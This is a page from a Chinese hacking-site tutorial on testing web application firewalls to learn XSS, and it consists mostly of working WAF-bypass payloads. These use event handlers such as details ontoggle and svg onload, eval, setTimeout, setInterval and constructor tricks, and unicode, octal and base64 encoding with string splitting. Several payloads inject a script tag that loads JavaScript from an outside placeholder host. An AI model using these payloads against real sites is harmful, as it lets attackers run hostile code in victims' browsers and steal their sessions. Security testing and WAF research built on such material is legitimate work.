欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

测试WAF来学习XSS姿势(二)

来源:本站整理 作者:佚名 时间:2019-04-15 TAG: 我要投稿

也可以选择将alert(1)编码,因为有eval存在啊,直接拿来用
details open ontoggle=top[a='al',b='ev',b%2ba](atob('YWxlcnQoMSk='))>
al',b='ev',b%2ba]('141154145162164506151')>
details open ontoggle=top[a='al',b='ev',b%2ba]('u0061u006cu0065u0072u0074u0028u0031u0029')>

setTimeout()函数也是没问题的,毕竟也能执行代码。
details open ontoggle=top[a='meout',b='setTi',b%2ba]('141154145162164506151')>
 
eval函数的补充
setTimeout

waf拦截
svg/onload=setTimeout`alert(1)`>

编码下,就绕过了。
svg/onload=setTimeout`alertu0028233u0029`>

setInterval
与setInterval不同,对于setTimeout()只执行code一次。


绕过waf,引用外部js。
svg/onload=setInterval(appendChild(createElement('script')).src='http://xx.xx/eeW')>

其他
拆分与编码
svg/onload=u0073etInterval(appendChild(createElement('script')).src='http://xx.xx/eeW')>
svg/onload=u0073etInterval(appendChild(createElement('sc162ipt')).src='http://xx.xx/eeW')>
svg/onload=u0073etInterval(appendChild(createElement('scr'%2b'ipt')).src='http://xx.xx/eeW')>
svg/onload=u0073etInterval(u0061ppendChild(u0063reateElement('scr'%2b'ipt')).src='http://xx.xx/eeW')>
结合函数:
iframe onload=s=createElement('script');body.appendChild(s);s.src=['http','://','xx.xx','/eeW'].join('') >
svg/onload=s=createElement('script');body.appendChild(s);s.src=['http']%2B['://']%2B['xx.xx']%2B['/eeW'].join('') >
svg/onload=s=u0063reateElement('scr'%2b'ipt');u0062ody.u0061ppendChild(s);s.src='http://x'.concat('x.xx/','eeW'); >
扩展
关于运用基于DOM的方法创建和插入节点把外部JS文件注入到网页,这种方法在>有介绍过。我这里简单演示下,如果你了解或者不感兴趣可以跳过这段。
首先用createElement方法创建一个script标签。

接下来给的src属性设置成外部url

可以看到标签以及src属性已经被创建出来,但是并不在页面上输出啊。

我们就要用到appendChild()方法将变量s插入页面。

再来看看页面上

constructor属性

少年!Post到什么了没有。

又是拆分。。注意后面的()
svg/onload=Set.constructor('al'%2b'ert(1)')()>

上一页  [1] [2] [3]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载